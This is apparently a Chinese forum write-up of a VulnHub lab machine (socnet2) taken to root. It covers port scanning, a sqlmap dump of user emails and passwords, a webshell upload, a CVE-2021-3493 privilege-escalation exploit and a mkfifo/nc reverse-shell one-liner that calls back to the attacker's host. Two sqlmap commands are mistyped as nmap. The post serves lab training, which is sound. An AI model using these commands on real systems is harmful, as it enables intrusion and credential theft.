shanque打靶日记-day5

F0re4t   ·   发表于 2022-06-06 14:36:59   ·   技术文章

shanqueday5

靶机:https://download.vulnhub.com/boredhackerblog/hard_socnet2.ova
攻击机:kali2022.2
目标:root权限

信息收集

主机发现

arp-scan -l


得到靶机地址:10.0.3.10

端口扫描

全端口扫描

nmap -p- 10.0.3.10


开放
22
80
8000

服务探测

nmap -p22,80,8000 -sV 10.0.3.10


22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
8000/tcp open http BaseHTTPServer 0.3 (Python 2.7.15rc1)

web渗透

信息收集

访问80页面,发现要邮箱登陆,不考虑爆破。并且开放了注册


注册个账号进去看看


聊天框存在xss,但是不太可能利用得上毕竟只是打靶


通过发言可以收集到信息,有一个admin账号,一个testuser账号,并且admin说了一句它运行了一个moniter.py的脚本


搜索框发现单引号可以报错,是个mysql数据库,搜索的传参名:query

上burp抓包,然后生成一个shanque.txt把包粘贴放进去,sqlmap

sqlmap -r shanque.txt -p query
sqlmap -r shanque.txt -p query --dbs


其中socialnetwork应该就是刚刚我们80端口那个社交网站的库

nmap -r shanque.txt -p query -D socialnetwork --tables


查询users表的字段

nmap -r shanque.txt -p query -D socialnetwork -T users --columns


通过刚刚的信息收集知道,我们要的应该是邮箱和密码这两个内容

sqlmap -r shanque.txt -p query -D socialnetwork -T users -C user_password,user_email --dump


登陆admin账号,和普通用户比也没有别的功能,但是发现了一个文件上传点


上传shell,尝试连接


获得了一个蚁剑的shell,信息收集,提权

uname -a
lsb_release -a


可以使用去年爆出来的针对ubantu的漏洞提权,CVE-2021-3493,我放附件里了


把这个exploit.c传上去,然后gcc编译成可执行文件执行

gcc -o shanque exploit.c
chmod +x shanque


获得了一个#的命令行又退出了,应该是蚁剑的shell有问题,用nc弹一个到kali上来,不确定是否靶机的nc有-e参数除了前几次的用|连接以外,今天又学到个新方法

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.0.3.4 6666 >/tmp/f


确保shell能交互是操作,在用python来获取一个

python -c "import pty; pty.spawn('/bin/bash')"


提权成功

总结

主机发现
端口扫描、服务探测
sql注入拿管理员账号
文件上传getshell
蚁剑shell弹一个shell到kali,在用python做一个升级
漏洞利用
提权

用户名金币积分时间理由
Track-劲夫 50.00 0 2022-06-06 19:07:22 一个受益终生的帖子~~

打赏我,让我更有动力~

附件列表

CVE-2021-3493-main.zip   文件大小:0.002M (下载次数:0)

0 条回复   |  直到 2022-6-6 | 724 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.